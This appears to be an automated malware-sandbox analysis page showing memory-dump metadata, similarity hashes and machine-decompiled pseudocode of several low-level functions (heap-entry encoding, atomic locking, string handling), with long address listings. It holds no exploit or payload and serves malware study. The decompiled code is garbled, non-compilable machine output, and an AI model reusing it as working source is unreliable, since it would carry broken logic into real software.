                                                0x0094a2f6
                                                0x0094a2f9
                                                0x0094a2fe
                                                0x0094a301
                                                0x0094a304
                                                0x0094a307
                                                0x0094a309
                                                0x0094a30f
                                                0x0094a312
                                                0x0094a315
                                                0x0094a317
                                                0x0094a31a
                                                0x00000000
                                                0x00000000
                                                0x0094a322
                                                0x0094a324
                                                0x0094a327
                                                0x00000000
                                                0x00000000
                                                0x0094a3aa
                                                0x0094a3c7
                                                0x0094a3c7
                                                0x0094a3c7
                                                0x0094a3c0
                                                0x0094a3c4

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: aeed1e437a9d6237489cace23aad8d007ee24d5363adc6a47675538a8f742a04
                                                • Instruction ID: 106ccd68ec616b0077e016462df41197eff3955ef174a660404bfe330d493aab
                                                • Opcode Fuzzy Hash: aeed1e437a9d6237489cace23aad8d007ee24d5363adc6a47675538a8f742a04
                                                • Instruction Fuzzy Hash: AB51E373E105258BE3008E19CC00699B693EBC4314F2FC679EC28DB385EA79ED12C6C0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00935485, Relevance: .2, Instructions: 172COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 92%
                                                			E00935485() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _t32;
				intOrPtr _t38;
				signed int _t40;
				unsigned int _t41;
				unsigned int _t42;
				signed int _t50;
				signed int _t85;
				signed int _t89;
				unsigned int _t90;
				signed int _t92;
				signed int _t94;
				signed int _t96;
				signed int _t97;
				signed int _t99;
				signed int _t101;
				signed int _t102;
				signed int _t106;
				signed int _t108;
				signed int _t109;
				signed int _t117;
				signed int _t118;
				signed int _t124;
				signed int _t125;
				signed int _t132;
				void* _t136;

				_t72 = 1;
				asm("lock xadd [eax], ecx");
				goto L6;
				do {
					do {
						L6:
						_t72 = 0xff;
						while(1) {
							_t109 =  *0x9d02e0; // 0x0
							_t118 =  *0x9d02e4; // 0x0
							__eflags = _t109 | _t118;
							_v16 = _t109;
							_v12 = _t118;
							if((_t109 | _t118) == 0) {
								goto L17;
							}
							L8:
							_t40 =  *0x9d02e8; // 0x0
							_t89 =  *0x9d02ec; // 0x0
							_t41 = _t40 & _t109;
							_t90 = _t89 & _t118;
							__eflags = _t41 | _t90;
							if((_t41 | _t90) == 0) {
								goto L17;
							}
							break;
							L17:
							_t38 =  *0x9d02f0; // 0x8
							__eflags =  *0x9d02f4 - _t38 - 1; // 0xffffffff
							if(__eflags < 0) {
								asm("lock xadd [edx], esi");
								_v8 = 1;
								_t136 = 2 -  *0x9d02f0; // 0x8
								if(_t136 >= 0) {
									asm("lock xadd [eax], edx");
									goto L18;
								} else {
									_v16 = E009047C0(1, 2, 0);
									_v12 = 0;
									goto L3;
									L16:
									return _t50;
									L3:
									_t132 =  *0x9d02e8; // 0x0
									_t106 =  *0x9d02ec; // 0x0
									_v20 = _t106;
									asm("lock cmpxchg8b [edi]");
									if(_t132 != _t132 || _t106 != _v20) {
										goto L3;
									} else {
										 *0x9d02e0 =  !_v16;
										 *0x9d02e4 =  !_v12;
										_t50 = _v8;
										 *((intOrPtr*)(0x9d02f8 + _t50 * 4)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
										goto L16;
									}
								}
							}
							L18:
							_t32 =  *0x9d02e8; // 0x0
							_t85 =  *0x9d02ec; // 0x0
							_t117 =  *0x9d02e0; // 0x0
							_t108 =  *0x9d02e4; // 0x0
							__eflags = _t32 & _t117 | _t85 & _t108;
							if((_t32 & _t117 | _t85 & _t108) == 0) {
								 *0x9d02e0 = 0xffffffff;
								 *0x9d02e4 = 0xffffffff;
								asm("lock xadd [eax], edx");
							}
							asm("lock xadd [eax], edx");
							_t109 =  *0x9d02e0; // 0x0
							_t118 =  *0x9d02e4; // 0x0
							__eflags = _t109 | _t118;
							_v16 = _t109;
							_v12 = _t118;
							if((_t109 | _t118) == 0) {
								goto L17;
							}
							goto L8;
						}
						__eflags = _t41;
						if(_t41 == 0) {
							_t42 = _t90;
							__eflags = _t42 & 0x0000ffff;
							_t92 = _t42;
							if((_t42 & 0x0000ffff) == 0) {
								_t94 = _t92 >> 0x00000010 & _t72;
								__eflags = _t94;
								if(_t94 == 0) {
									_t29 = (_t42 >> 0x18) + 0x9037f8; // 0x10008
									_t124 = ( *_t29 & 0x000000ff) + 0x18;
									__eflags = _t124;
								} else {
									_t28 = _t94 + 0x9037f8; // 0x10008
									_t124 = ( *_t28 & 0x000000ff) + 0x10;
								}
							} else {
								_t97 = _t92 & _t72;
								__eflags = _t97;
								if(_t97 == 0) {
									_t27 = (_t42 >> 0x00000008 & _t72) + 0x9037f8; // 0x10008
									_t124 = ( *_t27 & 0x000000ff) + 8;
								} else {
									_t26 = _t97 + 0x9037f8; // 0x10008
									_t124 =  *_t26 & 0x000000ff;
								}
							}
							_t125 = _t124 + 0x20;
						} else {
							__eflags = _t41 & 0x0000ffff;
							_t99 = _t41;
							if((_t41 & 0x0000ffff) == 0) {
								_t101 = _t99 >> 0x00000010 & _t72;
								__eflags = _t101;
								if(_t101 == 0) {
									_t25 = (_t41 >> 0x18) + 0x9037f8; // 0x10008
									_t125 = ( *_t25 & 0x000000ff) + 0x18;
								} else {
									_t24 = _t101 + 0x9037f8; // 0x10008
									_t125 = ( *_t24 & 0x000000ff) + 0x10;
								}
							} else {
								_t102 = _t99 & _t72;
								__eflags = _t102;
								if(_t102 == 0) {
									_t23 = (_t41 >> 0x00000008 & _t72) + 0x9037f8; // 0x10008
									_t125 = ( *_t23 & 0x000000ff) + 8;
								} else {
									_t16 = _t102 + 0x9037f8; // 0x10008
									_t125 =  *_t16 & 0x000000ff;
								}
							}
						}
						E009047C0(1, _t125, 0);
						_t96 = _v12;
						asm("lock cmpxchg8b [edi]");
						__eflags = _t109 - _v16;
					} while (_t109 != _v16);
					__eflags = _t96 - _v12;
				} while (_t96 != _v12);
				 *((intOrPtr*)(0x9d02f8 + _t125 * 4)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
				_t50 = _t125;
				goto L16;
			}
































                                                0x00935494
                                                0x00935495
                                                0x0093549b
                                                0x0093549c
                                                0x0093549c
                                                0x0093549c
                                                0x0093549c
                                                0x009354a1
                                                0x009354a1
                                                0x009354a7
                                                0x009354af
                                                0x009354b1
                                                0x009354b4
                                                0x009354b7
                                                0x00000000
                                                0x00000000
                                                0x009354bd
                                                0x009354bd
                                                0x009354c2
                                                0x009354c8
                                                0x009354ca
                                                0x009354ce
                                                0x009354d0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00935562
                                                0x00935562
                                                0x00935568
                                                0x0093556e
                                                0x00934e89
                                                0x00934e8e
                                                0x00934e91
                                                0x00934e97
                                                0x0096279f
                                                0x00000000
                                                0x00934e9d
                                                0x00934ea9
                                                0x00934eac
                                                0x00934eac
                                                0x00935544
                                                0x00935548
                                                0x00934eaf
                                                0x00934eaf
                                                0x00934eb5
                                                0x00934ec1
                                                0x00934ecf
                                                0x00934ed5
                                                0x00000000
                                                0x00934edc
                                                0x00934ee4
                                                0x00934eeb
                                                0x00934efa
                                                0x00934efd
                                                0x00000000
                                                0x00934efd
                                                0x00934ed5
                                                0x00934e97
                                                0x00935574
                                                0x00935574
                                                0x00935579
                                                0x0093557f
                                                0x00935585
                                                0x0093558f
                                                0x00935591
                                                0x00935595
                                                0x0093559f
                                                0x009355af
                                                0x009355af
                                                0x009355bb
                                                0x009354a1
                                                0x009354a7
                                                0x009354af
                                                0x009354b1
                                                0x009354b4
                                                0x009354b7
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009354b7
                                                0x009354d6
                                                0x009354d8
                                                0x00962748
                                                0x00962750
                                                0x00962752
                                                0x00962754
                                                0x00962777
                                                0x00962777
                                                0x00962779
                                                0x0096278a
                                                0x00962791
                                                0x00962791
                                                0x0096277b
                                                0x0096277b
                                                0x00962782
                                                0x00962782
                                                0x00962756
                                                0x00962756
                                                0x00962756
                                                0x00962758
                                                0x00962768
                                                0x0096276f
                                                0x0096275a
                                                0x0096275a
                                                0x0096275a
                                                0x0096275a
                                                0x00962758
                                                0x00962794
                                                0x009354de
                                                0x009354e1
                                                0x009354e3
                                                0x009354e5
                                                0x00962721
                                                0x00962721
                                                0x00962723
                                                0x00962737
                                                0x0096273e
                                                0x00962725
                                                0x00962725
                                                0x0096272c
                                                0x0096272c
                                                0x009354eb
                                                0x009354eb
                                                0x009354eb
                                                0x009354ed
                                                0x0096270f
                                                0x00962716
                                                0x009354f3
                                                0x009354f3
                                                0x009354f3
                                                0x009354f3
                                                0x009354ed
                                                0x009354e5
                                                0x00935501
                                                0x0093550a
                                                0x0093551c
                                                0x00935520
                                                0x00935520
                                                0x00935529
                                                0x00935529
                                                0x0093553b
                                                0x00935542
                                                0x00000000

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: be2cd54d004f60e922af973bb2c74482b921decb3750b66a46f3d969c662e75a
                                                • Instruction ID: ba43f2584d4d2f23db31c7f87a1585dd01b67c2b311fded02e3ee64baa7f5ab0
                                                • Opcode Fuzzy Hash: be2cd54d004f60e922af973bb2c74482b921decb3750b66a46f3d969c662e75a
                                                • Instruction Fuzzy Hash: B5512B76F96A218FC718CB1D8C4462CBBE6FBC9311F1E8166D9A9D7351C6349C819B80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00932E2F, Relevance: .2, Instructions: 159COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00932E2F(void* __ecx, void* __edx, intOrPtr _a4, signed short* _a8, signed short _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				signed short _t46;
				intOrPtr* _t48;
				intOrPtr _t49;
				signed short _t51;
				signed short _t56;
				void* _t58;
				signed short _t71;
				void* _t79;
				signed short _t81;
				signed int _t83;
				signed short* _t86;
				signed short _t87;
				signed short* _t112;
				signed short* _t114;

				_t46 = _a12;
				_v8 = 0;
				_v12 = 0;
				if(_t46 != 0) {
					 *_t46 = 0;
				}
				_t114 = _a8;
				if(_t114 == 0 || _a4 != 0) {
					L17:
					_v8 = 0xc000000d;
					goto L12;
				} else {
					_t48 = _a16;
					if(_t48 != 0) {
						_t49 =  *_t48;
						if(_t49 == 0) {
							goto L4;
						}
						_t83 = _t49 - _t114[2] >> 1;
						_v12 = _t83;
						if(_t83 < ( *_t114 & 0x0000ffff) >> 1) {
							goto L4;
						}
						goto L17;
					}
					L4:
					_t86 = 0x932dd4;
					if(E00906C0E(0x932dd4, _t114, 1) != 0) {
						_t51 = _a12;
						_t112 = 0x9330a4;
						if(_t51 == 0) {
							L7:
							_t56 = ( *_t114 >> 0x00000001) - ( *_t86 >> 0x00000001) + ( *_t112 >> 0x00000001) & 0x0000ffff;
							_a12 = _t56;
							_t58 = (_t56 & 0x0000ffff) + (_t56 & 0x0000ffff) + 2;
							if(_t58 > 0xfffe) {
								_v8 = 0xc0000106;
								L12:
								return _v8;
							}
							_t94 =  &(_t114[4]);
							if( &(_t114[4]) == 0 || _t58 > _t114[8]) {
								if(E009278E5(0, _t94, _t58) >= 0) {
									goto L10;
								}
								_v8 = 0xc0000017;
							} else {
								L10:
								_t114[1] = _t114[8];
								_t114[2] = _t114[4];
								E00908980(_t114[4] + (( *_t112 & 0x0000ffff) >> 1) * 2, _t114[4] + (( *_t86 & 0x0000ffff) >> 1) * 2, ( *_t114 & 0x0000ffff) - ( *_t86 & 0x0000ffff));
								_t21 =  &(_t112[2]); // 0x8f2920
								E008F2340(_t114[2],  *_t21,  *_t112 & 0x0000ffff);
								_t71 = _a12 + _a12;
								 *_t114 = _t71;
								 *((short*)(_t114[2] + ((_t71 & 0x0000ffff) >> 1) * 2)) = 0;
								if(_v12 != 0) {
									 *_a16 = _t114[2] + ((( *_t112 & 0x0000ffff) >> 1) - (( *_t86 & 0x0000ffff) >> 1) + _v12) * 2;
								}
								_v8 = _v8 & 0x00000000;
							}
							goto L12;
						}
						 *_t51 = 2;
						goto L7;
					}
					_t86 = 0x90a268;
					if(E00906C0E(0x90a268, _t114, 1) == 0) {
						_t87 = _a12;
						if(_t87 != 0) {
							_t79 = E008FE825(_t114);
							if(_t79 > 7) {
								goto L12;
							}
							_t43 = _t79 + 0x94e62c; // 0x10100
							switch( *((intOrPtr*)(( *_t43 & 0x000000ff) * 4 +  &M0094E624))) {
								case 0:
									goto L30;
								case 1:
									goto L31;
							}
						}
						goto L12;
					}
					_t81 = _a12;
					_t112 = 0x92ffd8;
					if(_t81 != 0) {
						 *_t81 = 3;
					}
					goto L7;
				}
			}



















                                                0x00932e36
                                                0x00932e3b
                                                0x00932e3e
                                                0x00932e43
                                                0x0094e56c
                                                0x0094e56c
                                                0x00932e4b
                                                0x00932e51
                                                0x00933096
                                                0x00933096
                                                0x00000000
                                                0x00932e60
                                                0x00932e60
                                                0x00932e65
                                                0x0094e573
                                                0x0094e577
                                                0x00000000
                                                0x00000000
                                                0x0094e583
                                                0x0094e587
                                                0x0094e58c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0094e592
                                                0x00932e6b
                                                0x00932e70
                                                0x00932e7d
                                                0x00933071
                                                0x00933074
                                                0x0093307b
                                                0x00932ea8
                                                0x00932ec0
                                                0x00932ec3
                                                0x00932ec9
                                                0x00932ed2
                                                0x0094e5ad
                                                0x00932f4c
                                                0x00932f53
                                                0x00932f53
                                                0x00932ed8
                                                0x00932edd
                                                0x0094e5c4
                                                0x00000000
                                                0x00000000
                                                0x0094e5ca
                                                0x00932eec
                                                0x00932eec
                                                0x00932ef6
                                                0x00932efa
                                                0x00932f12
                                                0x00932f1b
                                                0x00932f21
                                                0x00932f2c
                                                0x00932f2e
                                                0x00932f3b
                                                0x00932f42
                                                0x0094e5ee
                                                0x0094e5ee
                                                0x00932f48
                                                0x00932f48
                                                0x00000000
                                                0x00932edd
                                                0x0094e597
                                                0x00000000
                                                0x0094e597
                                                0x00932e85
                                                0x00932e92
                                                0x00933086
                                                0x0093308b
                                                0x0094e5f6
                                                0x0094e5fe
                                                0x00000000
                                                0x00000000
                                                0x0094e604
                                                0x0094e60b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0094e60b
                                                0x00000000
                                                0x00933091
                                                0x00932e98
                                                0x00932e9b
                                                0x00932ea2
                                                0x0094e5a2
                                                0x0094e5a2
                                                0x00000000
                                                0x00932ea2

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6e6ec9bb06e5be135d0ce9f2333bb99dc875f4b1931a9168cdc708c73c36c70f
                                                • Instruction ID: 4abb26aa3f3315fc103dcde568d25988d6e8dfa31012e4f40e256443b06bb079
                                                • Opcode Fuzzy Hash: 6e6ec9bb06e5be135d0ce9f2333bb99dc875f4b1931a9168cdc708c73c36c70f
                                                • Instruction Fuzzy Hash: 2651BA74104616DFCB249F29C980ABE77F8FF49704F2088AAF882CB291E774D951DB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00904680, Relevance: .1, Instructions: 140COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 78%
                                                			E00904680(void* __edi, signed int _a4, signed int _a8, signed char _a12) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t48;
				unsigned int _t49;
				void* _t52;
				signed char _t56;
				void* _t58;
				void* _t60;
				intOrPtr _t66;
				signed short _t67;
				signed char _t68;
				signed int _t70;
				signed short _t73;
				signed short _t75;
				signed short _t82;
				void* _t89;
				signed int _t96;
				signed int _t98;

				_t95 = __edi;
				_t98 = _a4;
				_t48 = _a8 |  *(_t98 + 0x44);
				if((_t48 & 0x61000000) != 0) {
					__eflags = _t48 & 0x10000000;
					if(__eflags != 0) {
						goto L1;
					}
					return E009A1D0A(_t60, _t63, _t89, __edi, _t98, __eflags, _t98, _t48, _a12);
				}
				L1:
				_push(_t60);
				if(( *(_t98 + 0x48) & 0x00000001) != 0) {
					_t49 = E00940ACE(_t98, _a12, _t98, __eflags);
					L5:
					if(_t49 == 0) {
						_push(0xc000000d);
						 *((intOrPtr*)( *[fs:0x18] + 0xbf4)) = 0xc000000d;
						 *((intOrPtr*)( *[fs:0x18] + 0x34)) = E0090641D(__eflags);
						_t52 = 0;
					} else {
						_t16 = _t49 + 7; // 0x5e5f0004
						_t66 =  *_t16;
						if(_t66 == 4) {
							_t52 = E00985766(_t98, _t49);
						} else {
							_push(_t95);
							if(_t66 >= 0) {
								__eflags =  *(_t98 + 0x4c);
								if( *(_t98 + 0x4c) == 0) {
									_t67 =  *_t49 & 0x0000ffff;
								} else {
									_t82 =  *_t49;
									__eflags =  *(_t98 + 0x4c) & _t82;
									if(( *(_t98 + 0x4c) & _t82) != 0) {
										_t82 = _t82 ^  *(_t98 + 0x50);
										__eflags = _t82;
									}
									_t67 = _t82 & 0x0000ffff;
								}
							} else {
								_t17 = (_t49 >> 0x00000003 ^  *_t49 ^  *0x9d00a4 ^ _t98) + 0x10; // 0xe9f44589
								_t67 =  *_t17;
							}
							_t96 = _t67 & 0x0000ffff;
							_t18 = _t49 + 7; // 0x5e5f0004
							_t68 =  *_t18;
							if(_t68 == 5) {
								_t34 = _t49 + 4; // 0x464d884
								_t70 =  *(_t98 + 0x54) & 0x0000ffff ^  *_t34 & 0x0000ffff;
							} else {
								if((_t68 & 0x00000040) != 0) {
									_t36 = (_t68 & 0x3f) * 8; // 0x464d884
									_t70 =  *(_t49 + _t36 + 4) & 0x0000ffff;
								} else {
									if((_t68 & 0x0000003f) == 0x3f) {
										__eflags = _t68;
										if(_t68 >= 0) {
											__eflags =  *(_t98 + 0x4c);
											if( *(_t98 + 0x4c) == 0) {
												_t73 =  *_t49 & 0x0000ffff;
											} else {
												_t75 =  *_t49;
												__eflags =  *(_t98 + 0x4c) & _t75;
												if(( *(_t98 + 0x4c) & _t75) != 0) {
													_t75 = _t75 ^  *(_t98 + 0x50);
													__eflags = _t75;
												}
												_t73 = _t75 & 0x0000ffff;
											}
										} else {
											_t38 = (_t49 >> 0x00000003 ^  *_t49 ^  *0x9d00a4 ^ _t98) + 0x10; // 0xe9f44589
											_t73 =  *_t38;
										}
										_t45 = (_t73 & 0x0000ffff) * 8; // 0x6600fc7d
										_t70 =  *(_t49 + _t45 - 4);
									} else {
										_t70 = _t68 & 0x3f;
									}
								}
							}
							_t52 = (_t96 << 3) - _t70;
						}
					}
					return _t52;
				}
				_t56 = _a12;
				if((_t56 & 0x00000007) != 0) {
					_push(0);
					_push(0);
					_push(0);
					_push(_t56);
					_push(_t98);
					_push(9);
					L26:
					E0099F840(0, _t63, _t89, _t95, _t98, __eflags);
					_t49 = 0;
					goto L5;
				}
				_t58 = _t56 + 0xfffffff8;
				if( *((char*)(_t58 + 7)) == 5) {
					_t29 = _t58 + 6; // 0x5f000464
					_t63 = ( *_t29 & 0x000000ff) << 3;
					_t49 = _t58 - (( *_t29 & 0x000000ff) << 3);
				}
				if(( *(_t49 + 7) & 0x0000003f) == 0) {
					_push(0);
					_push(0);
					_push(0);
					_push(_t49);
					_push(_t98);
					_push(8);
					goto L26;
				} else {
					goto L5;
				}
			}






















                                                0x00904680
                                                0x00904689
                                                0x0090468c
                                                0x00904694
                                                0x009598b8
                                                0x009598bd
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009598c8
                                                0x0090469a
                                                0x0090469a
                                                0x009046a1
                                                0x00959901
                                                0x009046c9
                                                0x009046cb
                                                0x0095991e
                                                0x0095991f
                                                0x0095992a
                                                0x0095992d
                                                0x009046d1
                                                0x009046d1
                                                0x009046d1
                                                0x009046d7
                                                0x00959936
                                                0x009046dd
                                                0x009046dd
                                                0x009046e0
                                                0x00904731
                                                0x00904734
                                                0x00904745
                                                0x00904736
                                                0x00904736
                                                0x00904738
                                                0x0090473b
                                                0x0090473d
                                                0x0090473d
                                                0x0090473d
                                                0x00904740
                                                0x00904740
                                                0x009046e2
                                                0x009046f3
                                                0x009046f3
                                                0x009046f3
                                                0x009046f7
                                                0x009046fa
                                                0x009046fa
                                                0x00904700
                                                0x00959944
                                                0x00959948
                                                0x00904706
                                                0x00904709
                                                0x00959955
                                                0x00959955
                                                0x0090470f
                                                0x00904717
                                                0x0095995f
                                                0x00959961
                                                0x0095997a
                                                0x0095997d
                                                0x0095998e
                                                0x0095997f
                                                0x0095997f
                                                0x00959981
                                                0x00959984
                                                0x00959986
                                                0x00959986
                                                0x00959986
                                                0x00959989
                                                0x00959989
                                                0x00959963
                                                0x00959974
                                                0x00959974
                                                0x00959974
                                                0x00959994
                                                0x00959994
                                                0x0090471d
                                                0x00904720
                                                0x00904720
                                                0x00904717
                                                0x00904709
                                                0x00904728
                                                0x0090472a
                                                0x009046d7
                                                0x00000000
                                                0x0090472b
                                                0x009046a7
                                                0x009046ac
                                                0x009598e9
                                                0x009598ea
                                                0x009598eb
                                                0x009598ec
                                                0x009598ed
                                                0x009598ee
                                                0x009598f0
                                                0x009598f0
                                                0x009598f5
                                                0x00000000
                                                0x009598f5
                                                0x009046b2
                                                0x009046b9
                                                0x009598d2
                                                0x009598d6
                                                0x009598d9
                                                0x009598d9
                                                0x009046c3
                                                0x009598e0
                                                0x009598e1
                                                0x009598e2
                                                0x009598e3
                                                0x009598e4
                                                0x009598e5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f5bebad7c71cff1aeb61e1893feef4eae2e0e11bcf54126aa6f287c63d907663
                                                • Instruction ID: dd8a0014270f10c295d20e0a9d73b8d0e86372e5fb46aab7094434d08c9334c5
                                                • Opcode Fuzzy Hash: f5bebad7c71cff1aeb61e1893feef4eae2e0e11bcf54126aa6f287c63d907663
                                                • Instruction Fuzzy Hash: F34113B0204655DFEB28CF22C8A1B7733E9EF46352F14481EEE838B5D1D7299845E760
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00985955, Relevance: .1, Instructions: 125COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 94%
                                                			E00985955(signed int __ecx, signed int __edx, intOrPtr _a4, unsigned short _a6, unsigned int _a12, intOrPtr _a16) {
				intOrPtr* _v8;
				signed int _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t62;
				signed char _t63;
				signed short _t64;
				signed char _t67;
				signed short _t71;
				signed char _t81;
				unsigned short _t85;
				void* _t93;
				signed int _t94;
				intOrPtr* _t101;
				signed char _t108;
				unsigned int _t120;

				_push(__ecx);
				_push(__ecx);
				_t62 = _a4;
				_push(_t93);
				_t117 = __ecx;
				_t120 = _t62 - 8;
				_t101 = _t62 + (_a12 & 0x0000ffff) - 8;
				_t63 =  *(_t120 + 7);
				_v12 = __edx;
				_v8 = _t101;
				if(_t63 != 4) {
					__eflags = _t63 - 5;
					if(_t63 != 5) {
						__eflags = _t63 & 0x00000040;
						if((_t63 & 0x00000040) == 0) {
							__eflags = (_t63 & 0x0000003f) - 0x3f;
							if((_t63 & 0x0000003f) == 0x3f) {
								__eflags = _t63;
								if(_t63 >= 0) {
									__eflags =  *(__ecx + 0x4c);
									if( *(__ecx + 0x4c) == 0) {
										_t64 =  *_t120 & 0x0000ffff;
									} else {
										_t71 =  *_t120;
										__eflags =  *(__ecx + 0x4c) & _t71;
										if(( *(__ecx + 0x4c) & _t71) != 0) {
											_t71 = _t71 ^  *(__ecx + 0x50);
											__eflags = _t71;
										}
										_t64 = _t71 & 0x0000ffff;
									}
								} else {
									_t64 =  *((intOrPtr*)((_t120 >> 0x00000003 ^  *_t120 ^  *0x9d00a4 ^ __ecx) + 0x10));
								}
								_t94 =  *(_t120 + (_t64 & 0x0000ffff) * 8 - 4);
							} else {
								_t94 = _t63 & 0x3f;
							}
						} else {
							_t94 =  *(_t120 + 4 + (_t63 & 0x3f) * 8) & 0x0000ffff;
						}
					} else {
						_t94 =  *(__ecx + 0x54) & 0x0000ffff ^  *(_t120 + 4) & 0x0000ffff;
					}
					_t67 = _a12 >> 3;
					 *(_t101 + 6) = _t67;
					_t108 =  *(_t120 + 7) & 0x000000c0 | _t67 | 0x00000040;
					__eflags = _t108;
					 *(_t120 + 7) = _t108;
					goto L26;
				} else {
					_t81 =  *(__ecx + 0x44) | __edx;
					_t123 = _t81 & 0x00000001;
					if((_t81 & 0x00000001) == 0) {
						E008F22D0(_t123,  *((intOrPtr*)(__ecx + 0xcc)));
						_t101 = _v8;
					}
					if( *((intOrPtr*)(_t117 + 0x4c)) != 0) {
						 *_t120 =  *_t120 ^  *(_t117 + 0x50);
						_t125 =  *(_t120 + 3) - ( *(_t120 + 2) ^  *(_t120 + 1) ^  *_t120);
						if( *(_t120 + 3) != ( *(_t120 + 2) ^  *(_t120 + 1) ^  *_t120)) {
							E0099F8EE(_t93, _t117, _t120, _t125, _t117, _t120, 0);
							_t101 = _v8;
						}
					}
					 *_t120 =  *_t120 + _a12;
					_t94 =  *_t120 & 0xffff;
					_t85 = _a12 >> 3;
					 *(_t120 + 6) = _t85;
					_a6 = _t85;
					if( *((intOrPtr*)(_t117 + 0x4c)) != 0) {
						 *(_t120 + 3) =  *(_t120 + 2) ^  *(_t120 + 1) ^  *_t120;
						 *_t120 =  *_t120 ^  *(_t117 + 0x50);
					}
					if((( *(_t117 + 0x44) | _v12) & 0x00000001) == 0) {
						E008F2290( *((intOrPtr*)(_t117 + 0xcc)));
						_t101 = _v8;
						_t85 = _a6;
					}
					 *(_t101 + 6) = _t85;
					L26:
					 *((short*)(_t101 + 4)) = _t94 + _a12;
					 *_t101 = _a16;
					 *((char*)(_t101 + 7)) = 5;
					_t61 = _t101 + 8; // 0x8
					return _t61;
				}
			}





















                                                0x0098595a
                                                0x0098595b
                                                0x0098595c
                                                0x0098595f
                                                0x00985962
                                                0x00985968
                                                0x0098596b
                                                0x0098596f
                                                0x00985972
                                                0x00985975
                                                0x0098597a
                                                0x00985a12
                                                0x00985a14
                                                0x00985a22
                                                0x00985a24
                                                0x00985a38
                                                0x00985a3b
                                                0x00985a45
                                                0x00985a47
                                                0x00985a60
                                                0x00985a64
                                                0x00985a75
                                                0x00985a66
                                                0x00985a66
                                                0x00985a68
                                                0x00985a6b
                                                0x00985a6d
                                                0x00985a6d
                                                0x00985a6d
                                                0x00985a70
                                                0x00985a70
                                                0x00985a49
                                                0x00985a5a
                                                0x00985a5a
                                                0x00985a7b
                                                0x00985a3d
                                                0x00985a40
                                                0x00985a40
                                                0x00985a26
                                                0x00985a2c
